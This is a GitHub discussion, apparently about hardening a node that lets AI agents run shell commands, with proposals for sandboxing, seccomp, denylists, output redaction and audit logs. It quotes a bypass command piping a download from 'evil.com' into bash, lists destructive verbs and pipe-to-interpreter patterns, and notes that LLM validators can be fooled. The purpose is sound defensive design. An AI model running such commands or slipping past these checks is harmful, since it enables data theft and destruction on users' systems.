Copy Markdown
Collaborator

stepmikhaylov commented May 5, 2026

Security Concern

The node is capable to execute arbitrary shell commands on the host and to return their full output. In a cloud
environment this is effectively unrestricted remote code execution: an agent can exfiltrate secrets,
destroy data, or pivot to other services on the network. The current safety model is insufficient.


Current Implementation: Why the Allowlist Is Not Enough

The only guard is a regex allowlist (commandAllowlist) with two critical flaws:

  • Empty by default — open by default, content is user's responsibility. A node dropped into a cloud pipeline with no explicit
    configuration permits every command.
  • Flat-string regex matching is bypassable. A pattern like npm .* permits
    npm run build && curl https://evil.com | bash. The agent controls the full string and can craft
    inputs that satisfy the regex while doing something entirely different.

Required Improvements

1. Static Command-Line Checks

  • Shell AST parsing (e.g. bashlex) to inspect the command tree, not the raw string.
  • Mandatory denylist: unconditionally block pipe-to-interpreter (| bash, | sh), inline
    downloads (curl … | …), subshell expansion ($(…)), and dangerous chained operators.
  • LLM validation using light and fast models.
  • Strict mode: an empty allowlist should deny all, not allow all. Operators must opt into
    open execution explicitly.

2. Restricted Execution Environment

  • Network isolation via Linux network namespaces (unshare --net / bubblewrap --unshare-net)
    — blocks exfiltration and reverse shells with no root required.
  • Read-only filesystem with a single writable scratch directory scoped to workingDir.
  • rlimits (preexec_fn): cap file creation size, open file descriptors, and spawnable
    subprocesses.
  • cgroup limits: bound memory and IO bandwidth to prevent impact on co-located workloads.
  • Dedicated low-privilege OS user with no access to application credentials or the host home
    directory.
  • Explicit sandboxMode config (none / rlimits / bwrap), with rlimits as the minimum
    default for cloud deployments.

@joshuadarron
Copy link
Copy Markdown
Collaborator

Security Concern

The node is capable to execute arbitrary shell commands on the host and to return their full output. In a cloud environment this is effectively unrestricted remote code execution: an agent can exfiltrate secrets, destroy data, or pivot to other services on the network. The current safety model is insufficient.

Current Implementation: Why the Allowlist Is Not Enough

The only guard is a regex allowlist (commandAllowlist) with two critical flaws:

* **Empty by default** — open by default, content is user's responsibility. A node dropped into a cloud pipeline with no explicit
  configuration permits every command.

* **Flat-string regex matching is bypassable.** A pattern like `npm .*` permits
  `npm run build && curl https://evil.com | bash`. The agent controls the full string and can craft
  inputs that satisfy the regex while doing something entirely different.

Required Improvements

1. Static Command-Line Checks

* **Shell AST parsing** (e.g. `bashlex`) to inspect the command tree, not the raw string.

* **Mandatory denylist:** unconditionally block pipe-to-interpreter (`| bash`, `| sh`), inline
  downloads (`curl … | …`), subshell expansion (`$(…)`), and dangerous chained operators.

* **LLM validation** using light and fast models.

* **Strict mode:** an empty allowlist should _deny all_, not allow all. Operators must opt into
  open execution explicitly.

2. Restricted Execution Environment

* **Network isolation** via Linux network namespaces (`unshare --net` / `bubblewrap --unshare-net`)
  — blocks exfiltration and reverse shells with no root required.

* **Read-only filesystem** with a single writable scratch directory scoped to `workingDir`.

* **rlimits** (`preexec_fn`): cap file creation size, open file descriptors, and spawnable
  subprocesses.

* **cgroup limits:** bound memory and IO bandwidth to prevent impact on co-located workloads.

* **Dedicated low-privilege OS user** with no access to application credentials or the host home
  directory.

* **Explicit `sandboxMode` config** (`none` / `rlimits` / `bwrap`), with `rlimits` as the minimum
  default for cloud deployments.

Agree on containment-over-detection. The allowlist alone was never going to hold, and the sandbox tiers you laid out are the right shape. A few additions and one gap worth flagging before the design locks in.

Gap: the user's working directory.

The proposal protects the host but not the contents of workingDir. If that path is the user's repo or a mounted project volume (which is the realistic config people will run), the sandbox happily lets an agent rm -rf it, encrypt it, or git clean -fdx it. The denylist focuses on injection patterns, not destructive verbs. Worth either (a) treating workingDir as ephemeral per call with a separate mountPath for persistent inputs, or (b) gating destructive verbs (rm -rf, dd, mkfs, find -delete, truncate -s 0, redirects to /dev/*) behind an explicit approval token in the call args. I'd lean toward both.

Drop shell=True.

The executor currently runs Popen(..., shell=True). Most agent calls pass a single command and don't need shell features. Take argv as a list, run with shell=False, and the whole shell-injection class disappears. That makes the bashlex AST work mostly redundant. If we genuinely need pipes and globs, gate them behind an explicit useShell: true flag so the unsafe path is opt-in.

Quick wins to layer with rlimits:

  • PR_SET_NO_NEW_PRIVS in preexec_fn, one line, kills setuid escalation.
  • seccomp-bpf filter blocking ptrace, mount, unshare, setns, bpf, kexec_load, clone(CLONE_NEWUSER). Layers cleanly with bwrap.
  • Curated PATH pointing at a symlink farm of approved binaries, so even if validation fails, wget and nc aren't on disk to find.
  • Canonicalize and jail workingDir (resolve symlinks, reject paths that escape the scratch root).

Tier above bwrap.

For hostile-tenant cloud, bwrap shares a kernel with the host. Worth adding sandboxMode: docker or sandboxMode: gvisor for that case. The runtime already has Docker semantics elsewhere, so plumbing exists.

Output redaction.

Even with network isolation, stdout flows back to the model. If the agent is chained to anything with outbound calls, secrets in stdout become the exfiltration path. Scrub AWS_*, *_TOKEN, *_KEY, contents of ~/.aws/credentials, ~/.ssh/, .env patterns before returning.

Audit log to a separate sink.

Append-only log of every command, argv, exit code, truncation flag, written somewhere the sandboxed process can't reach. Containment fails silently otherwise.

One pushback on the LLM validator.

I'd list it as advisory only, not a gating tier. Adversarial inputs against small validators are well-documented, and once it's in the trust chain it becomes load-bearing. The AST plus denylist plus sandbox should do the actual gating. The LLM check is fine as belt-and-suspenders, not as a gate.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

docs Documentation module:nodes Python pipeline nodes

Projects

None yet

Development

Successfully merging this pull request may close these issues.

Tool: Shell

4 participants